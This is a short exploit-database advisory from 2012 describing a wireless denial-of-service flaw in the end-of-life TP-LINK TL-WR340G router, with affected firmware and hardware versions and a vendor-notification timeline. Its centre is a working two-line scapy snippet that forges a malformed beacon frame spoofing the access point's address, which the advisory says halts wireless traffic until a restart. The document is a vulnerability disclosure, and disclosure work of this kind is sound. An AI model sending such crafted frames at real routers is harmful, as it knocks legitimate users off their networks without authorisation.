TP-LINK TL-WR340G Denial Of Service



EKU-ID: 2622 CVE: OSVDB-ID:
Author: Adam P Published: 2012-09-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=== intro ===

TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. 
Now it's marked End-of-Life.

Transmitting crafted frames in proximity of working router cause device 
to malfunction. Wireless communication stops,  existing clients don't 
receive frames from AP ( except beacons ), new clients can't connect.


=== details ===

Affected product: TL-WR340G Wireless router
Firm Version:  4.7.11  Build 101102 Rel.60376n
Hardware Version: WR340G v3
Local/remote: Local ( wirelessly )

Vulnerability can be spotted by crafting and transmitting frame with scapy:

 >> fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP 
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
 >> sendp(fr,iface="injection capable wireless interface",count=5)

Attacker could cease wireless traffic. To resume AP functionality user 
must restart wireless interface in WebGUI or restart device.


=== time-line ===
2.08.2012 - vendor notified
4.09.2012 - no response from vendor, published